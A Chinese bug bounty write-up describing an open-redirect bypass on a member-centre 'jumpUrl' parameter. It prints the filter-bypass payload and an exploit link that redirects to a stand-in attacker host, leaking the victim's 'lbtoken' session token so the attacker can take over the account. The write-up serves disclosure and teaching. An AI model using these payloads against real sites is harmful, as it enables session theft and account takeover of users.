文章总结： 本文记录了作者在SRC众测活动中发现会员中心jumpUrl参数存在URL跳转漏洞。通过构造特定Payload绕过限制，利用Location头泄露的lbtoken接管用户账号，最终获得2000元赏金。 综合评分： 72 文章分类： SRC活动,WEB安全,漏洞分析,实战经验

被拦截了~

那就试试绕过，后面得到绕过的payload

GET /xxxxxxxxx&jumpUrl=/xxx/..;/;/www.baidu.com

请求返回的Location，有戏了….

此时回到原先跳转的Location

https://xxxxx.com/xxxx/xxxxx/index?lbtoken=xxxxxxx

这个地址是跳转到如下图：

点击开通并领取后，如未进行实名认证则会跳转到实名认证。

实名认证后即可进行借款，此时验证了lbtoken是存储着用户的登录信息的

如果不携带lbtoken或置空lbtoken，访问跳转网站

https://xxxxx.com/xxxx/xxxxx/index

发现是要进行登录的

漏洞利用过程

接下来就是这个漏洞的利用过程了

1. 攻击者通过url跳转漏洞获取到受害者的lbtoken
2. 使用获取到的lbtoken访问目标网站，接管受害者账号

因当前没有VPS，直接在kali上穿透一个web服务

构造好利用的链接

https://xxx.com/xxx/xxx/xx?xx=xx&jumpUrl=/xxx/..;/;/www.exploit.com

待受害者点击此链接后即可获取到受害者的lbtoken，接管账户。

此漏洞获得2k赏金

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：匠安天象 上官宏文《在一次SRC众测活动中斩杀2k赏金》